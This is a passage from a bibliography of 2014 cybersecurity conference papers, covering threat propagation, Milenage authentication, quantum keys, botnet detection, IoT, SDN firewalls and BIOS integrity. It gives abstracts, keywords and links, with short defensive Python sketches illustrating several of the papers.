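The acquisition step above centers on the UNIX dd command. A minimal Python sketch of the same idea follows: copy the source in blocks while hashing it, then verify the image against that hash, one ingredient of a forensically sound acquisition (the device path is illustrative, not from the paper, and a real acquisition would read a write-blocked source):

    import hashlib

    def acquire_image(source: str, image: str, block_size: int = 1 << 20) -> str:
        # Copy the source block by block (dd-style) while hashing the data,
        # and return the SHA-256 so the image can be verified afterwards.
        digest = hashlib.sha256()
        with open(source, "rb") as src, open(image, "wb") as dst:
            for block in iter(lambda: src.read(block_size), b""):
                digest.update(block)
                dst.write(block)
        return digest.hexdigest()

    def sha256_of(path: str, block_size: int = 1 << 20) -> str:
        digest = hashlib.sha256()
        with open(path, "rb") as f:
            for block in iter(lambda: f.read(block_size), b""):
                digest.update(block)
        return digest.hexdigest()

    # Illustrative paths; hashes would be recorded in the case log.
    source_hash = acquire_image("/dev/mmcblk0", "phone.img")
    assert source_hash == sha256_of("phone.img"), "image does not match source"
    print("acquisition verified:", source_hash)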

 

Rjaibi, N.; Gannouni, N.; Ben Arfa, L.; Ben Aissa, A., "Modeling the Propagation Of Security Threats: An E-Learning Case Study," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 32-37, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913968. In this paper, we propose a novel linear model for modeling the propagation of security threats among a system's architectural components: the Threats Propagation model (TP). Our model is based on the Mean Failure Cost cyber-security model (MFC) and is applied to an e-learning system. The Threats Propagation model (TP) shows whether a threat can propagate to other e-learning system components. It then provides an efficient diagnostic of the most critical threats in order to make the best decisions and to establish suitable countermeasures to avoid them. Our proposed model is useful for implementing a safe and secure e-learning environment.

Keywords: computer aided instruction; security of data; MFC; e-learning system; linear model; mean failure cost cyber-security model; secure e-learning environment; security threat propagation modeling; system architectural components; Analytical models; Electronic learning; Malware; Servers; Shape; Vectors; Countermeasures; Critical security threats; E-learning; The Mean Failure Cost; Threats propagation model (ID#: 14-3398)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913968&isnumber=6913961

 

Hassan, Z.Z.; Elgarf, T.A.; Zekry, A., "Modifying Authentication Techniques In Mobile Communication Systems," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 38-44, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913969. The Milenage algorithm applies the block cipher Rijndael (AES) with a 128-bit key and 128-bit block size. This algorithm is used in the 3GPP authentication and key generation functions (f1, f1*, f2, f3, f4, f5 and f5*) for mobile communication systems (GSM/UMTS/LTE). In this paper a modification of the Milenage algorithm is proposed through a dynamic change of the S-box in AES depending on the secret key. To get a new secret key for every authentication process, the random number (RAND) transmitted from the authentication center (AUC) is added to the contents of the fixed stored secret key (Ki), so the initialization of the AES will be different for each new authentication process. For every change in the secret key a new S-box is derived from the standard one by permuting its rows and columns with the help of a newly designed PN sequence generator. A complete simulation of the modified Milenage and the PN sequence generator is done using a microcontroller (PIC18F452). Security analysis is applied using the Avalanche test to compare the original and modified Milenage. Tests proved that the modified algorithm is more secure than the original one due to the dynamic behavior of the S-box with every change of the secret key and its immunity against linear and differential cryptanalysis. This makes the modified Milenage more suitable for authentication applications, especially in mobile communication systems.

Keywords: 3G mobile communication; cryptography; microcontrollers; telecommunication security; 3GPP authentication function; AES; AUC; GSM system; Global System for Mobile Communication; LTE system; Long-Term Evolution; Milenage algorithm; PIC18F452 microcontroller; RAND; Rijndael block cipher; UMTS system; Universal Mobile Telecommunication System; advanced encryption standard; authentication center; authentication techniques; avalanche test; key generation function; mobile communication system; random number; secret key; security analysis; Authentication; Ciphers; Generators; Heuristic algorithms; Long Term Evolution; Mobile communication; Vectors; AES; Authentication vector (AV); Dynamic S-BOX and PN Sequence Generator (LFSR); Modified MILENAGE Algorithm for AKA Functions (f1, f1*, f2, f3, f4, f5, f5*) (ID#: 14-3399)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913969&isnumber=6913961
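
Two steps carry the proposal above: a per-authentication key formed by adding RAND to the stored key Ki, and an S-box whose rows and columns are permuted under a key-derived PN sequence. The hypothetical Python sketch below mirrors just those steps; Python's random module stands in for the paper's LFSR-based PN generator, and the S-box table is a placeholder rather than the real AES S-box:

    import random

    SBOX = list(range(256))  # placeholder; the real AES S-box table goes here

    def session_key(ki: bytes, rand: bytes) -> bytes:
        # Per-authentication key: bytewise addition of Ki and RAND (mod 256).
        return bytes((a + b) % 256 for a, b in zip(ki, rand))

    def permuted_sbox(key: bytes) -> list:
        # random.Random stands in for the paper's LFSR-based PN generator.
        rng = random.Random(key)
        rows = list(range(16))
        cols = list(range(16))
        rng.shuffle(rows)
        rng.shuffle(cols)
        # Rebuild the 16x16 table with its rows and columns reordered.
        return [SBOX[16 * rows[r] + cols[c]]
                for r in range(16) for c in range(16)]

    ki = bytes(16)                          # illustrative 128-bit stored key
    rand = bytes(range(16))                 # illustrative RAND from the AUC
    box = permuted_sbox(session_key(ki, rand))
    assert sorted(box) == list(range(256))  # still a bijection, so invertible

Because a row/column permutation of a bijective table stays bijective, the modified cipher remains invertible while the S-box changes with every authentication.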

 

Jasim Mohammad, O.K.; Abbas, S.; El-Horbaty, E.-S.M.; Salem, A.-B.M., "Statistical Analysis For Random Bits Generation On Quantum Key Distribution," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 45-51, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913970. Recently, quantum cryptography researchers have utilized quantum keys in order to provide a more trusted environment for both key distribution and management processes. The quantum keys are generated based on quantum mechanics phenomena. However, all events for quantum key generation rely on exchanging photons between parties over limited distances. So, in this paper, random test algorithms, such as NIST and DIEHARD, are implemented to test and evaluate the randomness rates of quantum key generation. Then, the initialization vector, which is the seed of the symmetric encryption algorithms, is established based on specific analysis to serve as a key for the algorithms. The paper utilizes the BB84 quantum key distribution (QKD) protocol based on two different innovated modes, the raw and privacy modes.

Keywords: cryptographic protocols; quantum cryptography; statistical analysis; DIEHARD algorithm; NIST algorithm; QKD protocol; key distribution process; key management process; privacy mode; quantum cryptography; quantum key distribution; quantum mechanics phenomenon; random bits generation; random tests algorithm; raw mode; statistical analysis; Algorithm design and analysis; Encryption; NIST; Photonics; Privacy; Protocols; binary distribution; cryptographic analysis; pseudo random number; quantum key distribution; random number generator; statistical test (ID#: 14-3400)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913970&isnumber=6913961
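
The simplest member of the NIST battery the paper applies is the SP 800-22 monobit (frequency) test, which checks that ones and zeros in the bit stream are roughly balanced. A minimal Python sketch, illustrative only, since the paper runs the full NIST and DIEHARD suites:

    import math
    import random

    def monobit_p_value(bits) -> float:
        # NIST SP 800-22 frequency test: map 1 -> +1 and 0 -> -1, sum, and
        # compare the normalized magnitude against an unbiased source.
        n = len(bits)
        s_obs = abs(sum(1 if b else -1 for b in bits)) / math.sqrt(n)
        return math.erfc(s_obs / math.sqrt(2))

    # Illustrative run on pseudo-random bits; the paper would feed the
    # QKD-derived bit stream in here instead.
    bits = [random.getrandbits(1) for _ in range(10_000)]
    p = monobit_p_value(bits)
    print(f"p = {p:.4f}:", "pass" if p >= 0.01 else "fail")

A p-value of at least 0.01 is the conventional pass threshold for a single test in the battery.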

 

Kebande, V.R.; Venter, H.S., "A Cognitive Approach For Botnet Detection Using Artificial Immune System In The Cloud," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 52-57, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913971. The advent of cloud computing has given a provision for both good and malicious opportunities. Virtualization itself, as a component of cloud computing, has provided users with an immediate way of accessing limitless resource infrastructures. Botnets have evolved to be the most dangerous group of remote-operated zombie computers given the open cloud environment. They happen to be the dark side of computing due to their ability to run illegal activities through remote installations, attacks and propagation by exploiting vulnerabilities. The problem that this paper addresses is that botnet technology is advancing each day and detection in the cloud is becoming hard. In this paper, therefore, the authors present an approach for detecting an infection of a robot network in the cloud environment. The authors propose a detection mechanism using an Artificial Immune System (AIS). The results show that this research is significant.

Keywords: artificial immune systems; cloud computing; invasive software; virtualisation; AIS; artificial immune system; botnet detection; cloud computing; cognitive approach; directed graph network; resource infrastructure access; virtualization; Cloud computing; Computers; Detectors; Immune system; Monitoring; Pattern matching; Artificial immune system; Botnet; Cloud; Detection; Negative selection (ID#: 14-3401)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913971&isnumber=6913961
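
The keywords point to negative selection, the classic AIS mechanism: generate candidate detectors, discard any that match known-good ("self") patterns, and flag whatever a surviving detector matches as non-self. A toy Python sketch over fixed-length bit strings (all parameters invented, not the paper's):

    import random

    def matches(detector: str, pattern: str, r: int = 4) -> bool:
        # r-contiguous-bits rule, a common matching scheme in negative selection.
        return any(detector[i:i + r] == pattern[i:i + r]
                   for i in range(len(pattern) - r + 1))

    def train_detectors(self_set, length: int = 12, count: int = 50) -> list:
        # Keep only candidates that match no "self" (normal) pattern.
        detectors = []
        while len(detectors) < count:
            candidate = "".join(random.choice("01") for _ in range(length))
            if not any(matches(candidate, s) for s in self_set):
                detectors.append(candidate)
        return detectors

    self_set = {"000011110000", "000011110011"}   # illustrative normal traffic
    detectors = train_detectors(self_set)

    sample = "101101001011"                        # illustrative observation
    print("non-self (possible bot)?", any(matches(d, sample) for d in detectors))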

 

El Zouka, H.A.; Hosni, M.M., "On the Power of Quantum Cryptography and Computers," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 58-63, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913972. It is well known that threats and attacks to information on the digital network environment are growing rapidly, putting extra pressure on individuals and businesses to protect their privacy and intellectual property. For this reason, many cryptographic security protocols have been developed over the past decades in an attempt to protect the privacy between communicating parties and to reduce the risk of malicious attacks. However, most of the cryptographic algorithms developed so far are based on mathematical models and suffer from many security defects, such as brute force attacks, the factorization problem, and many others. Thus, most of these proposed cryptographic systems are not proven to be completely secure against the main threats of modern networking technologies and computing systems. In this paper, a security framework model for a quantum cryptography system, which is based on the physical properties of light particles, is proposed, and all security requirements to assist in ensuring confidentiality between communicating parties are incorporated. The research work in this paper is based on a series of experiments which have been advocated recently by agencies and researchers who used quantum technology as a more effective method for solving the key distribution problem. The results of the proposed method are demonstrated and validated by experiments.

Keywords: cryptographic protocols; data privacy; quantum cryptography; brute force attack; communicating parties; computers; computing systems; cryptographic algorithms; cryptographic security protocols; cryptographic systems; digital network environment; factorization problem; intellectual property; key distribution problem; malicious attacks; mathematical models; modern networking technologies; privacy; quantum cryptography system; quantum technology; security defects; security framework model; security requirements; Ciphers; Encryption; Optical fibers; Photonics; Public key; Cryptanalysis; Cryptography; Quantum Key Distribution; Quantum Technology; Security Protocols (ID#: 14-3402)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913972&isnumber=6913961

 

Kaddour, M.; Tmazirte, N.A.; El-Najjar, M.E.; Naja, Z.; Moubayed, N., "Autonomous Integrity Monitoring For GNSS Localization Using Informational Approach And Iono-Free Measurements," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 64-69, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913973. Receiver Autonomous Integrity Monitoring (RAIM) is used to improve positioning system safety. This paper proposes a new RAIM approach to detect and exclude multiple faults in GNSS measurements before position estimation. The new approach uses the information filter for position estimation and an information test for fault diagnosis. This test is based on the exponential convergence of the information filter, measured using mutual information. Results with real GNSS measurement data (C/A code and L1 phase) show the benefits of the proposed approach in improving GNSS receiver integrity positioning.

Keywords: Global Positioning System; estimation theory; fault diagnosis; radio receivers; radiotelemetry; C/A code; GNSS localization; GNSS measurement; L1 phase; RAIM approach; autonomous integrity monitoring; fault diagnosis; informational approach; iono-free measurement; multifault detection; mutual information; position estimation; positioning system safety; receiver autonomous integrity monitoring approach; Global Positioning System; Information filters; Mutual information; Phase measurement; Pollution measurement; Receivers; Satellites; GNSS localization; Information Filter; Information theory; Mutual Information (ID#: 14-3403)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913973&isnumber=6913961


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Information Assurance and Cyber Security (CIACS) - Pakistan


The 2014 Conference on Information Assurance and Cyber Security (CIACS) was held 12-13 June 2014 at Rawalpindi, Pakistan. Sponsored by the Department of Information Security (IS Department) at the Military College of Signals, NUST, Pakistan, CIACS is a forum for academic and professional research. The conference included 5 regular papers and 5 short papers, selected through a double-blind review process from a total of 65 high-quality technical paper submissions, for an acceptance rate of about 7.69% for regular papers and 15.38% for short papers. The papers collected in these proceedings cover topics like Authentication and Access Control, Botnets, Cryptography and Cryptanalysis, Data Security and Privacy, Digital Signatures, Information Hiding, Key Management, Secure Programming, Cloud Security, Computer Security, Database Security, Distributed Systems Security, Internet Security, Operating Systems Security, Physical Security, Social Networks Security, Web Services Security, Wireless Networks Security, Cyber Crime and Social Implications, Cyber Laws, Information Security Auditing and Management, Information Security Strategy, Security Standards and Best Practices, Cloud Forensics, Computer Emergency Response Team (CERT), Digital Forensics, Ethical Hacking, Future of Information Security, Incident Response, Malware Detection and Analysis, Penetration Testing and Vulnerability Assessment.

 

Zahid, A.; Masood, R.; Shibli, M.A., "Security of Sharded NoSQL Databases: A Comparative Analysis," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp. 1-8, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861323. NoSQL databases are easy to scale out because of their flexible schema and support for BASE (Basically Available, Soft State and Eventually Consistent) properties. The process of scaling out in most of these databases is supported by sharding, which is considered the key feature in providing faster reads and writes to the database. However, securing the data sharded over various servers is a challenging problem because the data is distributedly processed and transmitted over an unsecured network. Though extensive research has been performed on NoSQL sharding mechanisms, no specific criterion has been defined to analyze the security of sharded architectures. This paper proposes an assessment criterion comprising various security features for the analysis of sharded NoSQL databases. It presents a detailed view of the security features offered by NoSQL databases and analyzes them with respect to the proposed assessment criteria. The presented analysis helps various organizations in the selection of an appropriate and reliable database in accordance with their preferences and security requirements.

Keywords: SQL; security of data; BASE; NoSQL sharding mechanisms; assessment criterion; security features; sharded NoSQL databases; Access control; Authentication; Distributed databases; Encryption; Servers; Comparative Analysis; Data and Applications Security; Database Security; NoSQL; Sharding (ID#: 14-3382)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861323&isnumber=6861314

 

Sajjad, S.M.; Yousaf, M., "Security Analysis of IEEE 802.15.4 MAC in the Context of Internet of Things (IoT)," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp. 9-14, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861324. A paradigm in which the household objects around us, with embedded computational competences, are capable of producing and distributing information is referred to as the Internet of Things (IoT). IEEE 802.15.4 presents a power-efficient MAC layer for the Internet of Things (IoT). For the preservation of privacy and security, the Internet of Things (IoT) needs a stern security mechanism so as to stop mischievous communication inside the IoT structure. For this purpose, security weaknesses of the IEEE 802.15.4 MAC protocol and the most important attacks against it have to be examined. The security charter of IEEE 802.15.4 must also be analyzed in order to ascertain its limitations with regard to the Internet of Things (IoT). Various ranges of attacks taking place in the Contention Free Period (CFP), in addition to the Contention Access Period (CAP), of the super-frame structure need to be explored and discussed. In view of the shortlisted weaknesses, we arrive at the conclusion that the IEEE 802.15.4 security charter may be harmonized in accordance with the requirements of the Internet of Things, and the missing functionalities may be incorporated in the upper layers of the Internet of Things (IoT) architecture.

Keywords: Internet of Things; Zigbee; access protocols; computer network security; CAP; CFP; IEEE 802.15.4 MAC protocol; IEEE 802.15.4 security charter; Internet of Things; IoT; contention access period; contention free period; security mechanism; IEEE 802.15 Standards; Internet of Things; Payloads; Protocols; Radiation detectors; Security; Synchronization; IEEE 802.15.4; Internet of Things; IoT IETF Standardization; IoT Protocol Stack; Security (ID#: 14-3383)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861324&isnumber=6861314
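
For reference, the security suite the abstract analyzes defines eight AES-CCM* security levels. The sketch below enumerates them and summarizes what each level actually guarantees; level 4 (encryption without integrity) illustrates one of the charter's known soft spots. The helper function is our own illustration.

    from enum import IntEnum

    class SecurityLevel(IntEnum):
        """The eight IEEE 802.15.4 security levels (AES-CCM*)."""
        NONE        = 0   # no confidentiality, no integrity
        MIC_32      = 1   # 32-bit message integrity code only
        MIC_64      = 2
        MIC_128     = 3
        ENC         = 4   # encryption only, no integrity protection
        ENC_MIC_32  = 5
        ENC_MIC_64  = 6
        ENC_MIC_128 = 7

    def protects(level):
        """Summarize the guarantees of a given security level."""
        return {
            "confidentiality": level >= SecurityLevel.ENC,
            "integrity": level not in (SecurityLevel.NONE, SecurityLevel.ENC),
            "mic_bits": {1: 32, 2: 64, 3: 128, 5: 32, 6: 64, 7: 128}.get(int(level), 0),
        }

    # Ciphertext with no integrity check is malleable:
    print(protects(SecurityLevel.ENC))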

 

Mahmood, A.; Akbar, A.H., "Threats in End To End Commercial Deployments Of Wireless Sensor Networks And Their Cross Layer Solution," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.15,22, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861325 Commercial Wireless Sensor Networks (WSNs) can be accessed through sensor web portals. However, the associated security implications and threats that sensor web portals pose to 1) users/subscribers, 2) investors, and 3) third-party operators have not been treated in their entirety; contemporary work handles them only in parts. In this paper, we discuss the different kinds of security attacks and vulnerabilities, at different layers, facing users, investors including Wireless Sensor Network Service Providers (WSNSPs), and the WSN itself, in relation to the two well-known security guidance documents of the Department of Homeland Security (DHS) and the Department of Defense (DOD), these being the standard security documents to date. Further, we propose a comprehensive cross-layer security solution, in light of the guidelines given in the aforementioned documents, that is minimalist in implementation and achieves the purported security goals.

Keywords: telecommunication security; wireless sensor networks; Department of Defense; Department of Homeland Security; WSNSP; cross layer security solution; cross layer solution; end to end commercial deployments; security attacks; security goals; sensor web portals; standard security documents; wireless sensor network service providers; Availability; Mobile communication; Portals; Security; Web servers; Wireless sensor networks; Wireless sensor network; attacks; commercial; security; sensor portal; threats; web services (ID#: 14-3384)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861325&isnumber=6861314

 

Waqas, A.; Yusof, Z.M.; Shah, A.; Khan, M.A., "ReSA: Architecture for Resources Sharing Between Clouds," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.23,28, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861326 Cloud computing has emerged as a paradigm for hosting and delivering services over the Internet. It has evolved into a key computing platform for delivering on-demand resources that include infrastructures, software, applications, and business processes. Clouds are mostly deployed in ways that isolate them from one another, which prevents resource collaboration between different clouds. For example, a cloud consumer may request a resource that is not available at that point in time. Client satisfaction is important for business, as denying the client may be expensive in many ways. To fulfill the client request, the cloud may request the resource from some other cloud. In this research paper we propose a trustworthy architecture named ReSA (Resource Sharing Architecture) for sharing on-demand resources between different clouds that may be managed under the same or different rules, policies, and management.

Keywords: cloud computing; resource allocation; security of data; software architecture; Internet; ReSA; Resource Sharing Architecture; client request; client satisfaction; cloud computing; resources collaboration; service delivery; service hosting; trust worthy architecture; Cloud computing; Computational modeling; Computer architecture; Resource management; Software as a service; Standards organizations; cloud architecture; cloud computing; federated clouds; resource collaboration; resource management (ID#: 14-3385)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861326&isnumber=6861314

 

Arshad, A.; Kundi, D.-e.-S.; Aziz, A., "Compact Implementation of SHA3-512 on FPGA," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.29,33, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861327 In this work we present a compact design of the newly selected Secure Hash Algorithm (SHA-3) on the Xilinx Virtex-5 Field Programmable Gate Array (FPGA). The design is logically optimized for area efficiency by merging the Rho, Pi, and Chi steps of the algorithm into a single step. By logically merging these three steps we save 16% of the logical resources of the overall implementation. This in turn reduces latency and increases the design's maximum operating frequency. The implementation utilizes only 240 slices and runs at 301.02 MHz. Comparing our results with previously reported FPGA implementations of SHA3-512, our design achieves the best throughput-per-slice (TPS) ratio, 30.1.

Keywords: cryptography; field programmable gate arrays; logic design; Chi step; FPGA; Pi step; Rho step; SHA3-512; TPS; Virtex-5; Xilinx field programmable gate array device; area efficiency; compact implementation; cryptographic hash function; latency reduction; maximum operating frequency enhancement; secure hash algorithm; throughput-per-slice ratio; Algorithm design and analysis; Arrays; Clocks; Field programmable gate arrays; Hardware; Signal processing algorithms; Throughput; Cryptography; FPGA; SHA3; Security; Xilinx (ID#: 14-3386)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861327&isnumber=6861314
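
The merged Rho-Pi-Chi step is easier to see in software than in HDL. Below is a short Python sketch of one fused pass over the 5x5 Keccak lane state (Theta and Iota, the other round steps, are omitted); the FPGA design fuses the same data flow into a single combinational layer. This is our own illustration, not the authors' code.

    ROT = [[0, 36, 3, 41, 18],      # rho rotation offsets, indexed [x][y]
           [1, 44, 10, 45, 2],
           [62, 6, 43, 15, 61],
           [28, 55, 25, 21, 56],
           [27, 20, 39, 8, 14]]

    MASK = (1 << 64) - 1            # Keccak-f[1600] lanes are 64 bits wide

    def rotl(lane, n):
        return ((lane << n) | (lane >> (64 - n))) & MASK

    def rho_pi_chi(A):
        """One fused rho+pi+chi pass over A[x][y] (5x5 lanes of 64 bits)."""
        B = [[0] * 5 for _ in range(5)]
        for x in range(5):
            for y in range(5):
                # rho (rotate) and pi (permute) in a single assignment
                B[y][(2 * x + 3 * y) % 5] = rotl(A[x][y], ROT[x][y])
        # chi: non-linear mix along rows of B
        return [[B[x][y] ^ (((~B[(x + 1) % 5][y]) & B[(x + 2) % 5][y]) & MASK)
                 for y in range(5)] for x in range(5)]

    state = [[0] * 5 for _ in range(5)]
    state[1][0] = 0x0123456789ABCDEF
    print(hex(rho_pi_chi(state)[0][0]))   # the lane has been rotated and moved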

 

Chattha, N.A., "NFC — Vulnerabilities and Defense," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.35,38, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861328 Near Field Communication (NFC) has been in use for quite some time in mobile devices, and its use is growing with the rapid increase in the availability of NFC-enabled devices in the market. It enables data transfer by bringing two devices into close proximity, about 3-5 inches. It is designed for integration with mobile phones, which can communicate with other phones (peer-to-peer) or read information on tags and cards (reader). An NFC device can also be put in card emulation mode, to offer compatibility with other contactless smart card standards. This enables NFC-enabled smartphones to replace the traditional contactless plastic cards used in public transport ticketing, access control, ATMs, and similar applications. NFC is a new and innovative technology with futuristic uses, but technology comes at a price, both in financial terms and in maintenance costs. The most pertinent concern is how vulnerable the new technology is. There have already been instances where the security of NFC has been called into question, and it is vulnerable to numerous kinds of attacks. This paper lists the basic working principles of NFC, the protocols involved, the vulnerabilities reported so far, and possible countermeasures against the weaknesses.

Keywords: near-field communication; protocols; radiofrequency identification; smart cards; smart phones; telecommunication security; NFC enabled devices; NFC enabled smart-phones; NFC security; card emulation mode; contactless smart card standards; data transfer; mobile devices; mobile phones; near field communication; protocols; radio frequency identification; Emulation; Mobile handsets; Peer-to-peer computing; Protocols; Radio frequency; Radiofrequency identification; Security; NFC; NFC security; Near Field Communication; RFID; Radio Frequency Identification (ID#: 14-3387)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861328&isnumber=6861314

 

Javid, T.; Riaz, T.; Rasheed, A., "A Layer2 Firewall For Software Defined Network," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.39,42, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861329 Software-defined networking is an emerging three-layer architecture comprising data, control, and application planes. The data and control planes implement forwarding and routing functions, respectively, while the application plane contains communicating processes. This paper presents a layer-2 firewall implementation using an example tree topology with one controller, three switches, and four hosts. Our implementation uses the POX controller at the control plane of the architecture. The modified code successfully controlled the flow of packets between hosts according to the firewall rules.

Keywords: firewalls; POX controller; example tree topology; forwarding function; layer2 firewall implementation; routing function; software defined networking; three layer architecture; Computer architecture; Control systems ;Firewalls (computing); Flowcharts; Network topology; Ports (Computers);Topology; Firewall; Mininet; OpenFlow; POX; SDN (ID#: 14-3388)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861329&isnumber=6861314
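
For readers who want to see what such a POX component looks like, here is a minimal sketch in the spirit of the paper's implementation (not the authors' code). The MAC pairs in the policy are placeholders; an OpenFlow flow-mod with no actions instructs the switch to drop matching packets.

    # Run as a POX module, e.g.: ./pox.py l2firewall
    from pox.core import core
    import pox.openflow.libopenflow_01 as of
    from pox.lib.addresses import EthAddr

    log = core.getLogger()

    # Hypothetical policy: traffic between these host pairs is dropped.
    BLOCKED_PAIRS = [
        ("00:00:00:00:00:01", "00:00:00:00:00:04"),
    ]

    def _handle_ConnectionUp(event):
        for src, dst in BLOCKED_PAIRS:
            for a, b in ((src, dst), (dst, src)):   # block both directions
                fm = of.ofp_flow_mod()
                fm.match.dl_src = EthAddr(a)
                fm.match.dl_dst = EthAddr(b)
                # No actions in the flow mod, so matching packets are dropped.
                event.connection.send(fm)
        log.info("Firewall rules installed on switch %s", event.dpid)

    def launch():
        core.openflow.addListenerByName("ConnectionUp", _handle_ConnectionUp)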

 

Durrani, A., "Analysis and Prevention Of Vulnerabilities In Cloud Applications," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.43,46, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861330 Cloud computing has emerged as the single most talked-about technology of recent times. Its aim of providing agile information technology solutions and infrastructure is the primary reason for its popularity. It enables organizations to ensure that their resources are utilized efficiently, that the development process is enhanced, and that the investments or costs incurred to buy technological resources are reduced. At the same time, cloud computing is being scrutinized in the security world due to the various vulnerabilities and threats it poses to user data and resources. This paper highlights the vulnerabilities that exist in applications available on the cloud and analyzes the different types of security holes found in these applications using open-source vulnerability assessment tools. It identifies the security requirements pertinent to these applications and assesses whether those requirements are met by testing two such applications with the vulnerability tools. It also provides remedial measures for the security holes found, enabling users to select a secure provider while at the same time enabling cloud providers to improve their services and find a competitive edge in the market.

Keywords: cloud computing; security of data; agile information technology solutions; cloud applications; cloud computing; development process enhancement; open source vulnerability assessment tools; resource utilization; security holes; security requirements; vulnerability analysis; vulnerability prevention; Cloud computing; Electronic mail; Encryption; Linux; Organizations; Servers; Kali Linux; Vega; Vmware; cloud computing; degaussing; deployment models; multi client environment (ID#: 14-3389)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861330&isnumber=6861314

 

Butt, M.I.A., "BIOS Integrity and Advanced Persistent Threat," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.47,50, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861331 The Basic Input Output System (BIOS) is the most important component of a computer system by virtue of its role: it holds the code that is executed at startup. It is considered the trusted computing base, and its integrity is extremely important for the smooth functioning of the system. At the same time, the BIOS of new computer systems (servers, laptops, desktops, network devices, and other embedded systems) can be easily upgraded using a flash or capsule mechanism, which can introduce new vulnerabilities through malicious code, accidental incidents, or deliberate attack. The attack on an Iranian nuclear facility (Stuxnet) [1:2] is an example of an advanced persistent attack. This attack vector adds a new dimension to the information security (IS) spectrum, which needs to be guarded against with a holistic approach employed at the enterprise level. Malicious BIOS upgrades can also cause denial of service, theft of information, or the addition of new backdoors that attackers can exploit to cause business loss, passive eavesdropping, or total destruction of the system without the user's knowledge. To address this challenge, a capability for verifying BIOS integrity needs to be developed, and due diligence must be observed for proactive resolution of the issue. This paper explains BIOS integrity threats and presents a prevention strategy for effective and proactive resolution.

Keywords: computer network security; data integrity; firmware; trusted computing; BIOS integrity; Iranian Nuclear Power Plant; Stuxnet; advanced persistent threat; basic input output system; information security spectrum; roots of trust; Biological system modeling; Hardware; Organizations; Security; Servers; Vectors; Advanced Persistent Threat (APT); BIOS Integrity Measurement; Original Equipment Manufacturer (OEM); Roots of Trust (RoTs); Trusted Computing (ID#: 14-3390)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861331&isnumber=6861314
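
As a concrete illustration of the verification capability the paper calls for, the sketch below hashes a captured firmware image and compares it against a known-good baseline. The file path and golden digest are placeholders; in practice the baseline would be anchored in a hardware root of trust such as a TPM PCR, not a constant in a script.

    import hashlib

    GOLDEN_SHA256 = "0" * 64          # placeholder: vendor-published digest

    def measure(image_path):
        """Compute the SHA-256 measurement of a firmware image."""
        h = hashlib.sha256()
        with open(image_path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()

    def verify(image_path):
        digest = measure(image_path)
        if digest != GOLDEN_SHA256:
            print("ALERT: BIOS digest %s does not match baseline" % digest)
            return False
        return True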

 

Ullah, R.; Nizamuddin; Umar, A.I.; ul Amin, N., "Blind Signcryption Scheme Based On Elliptic Curves," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.51,54, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861332 In this paper a blind signcryption scheme using the elliptic curve cryptosystem is presented. It satisfies the functionalities of confidentiality, message integrity, unforgeability, signer non-repudiation, message unlinkability, sender anonymity, and forward secrecy. The proposed scheme has low computation and communication overhead compared to existing blind signcryption schemes and is best suited for mobile phone voting and m-commerce.

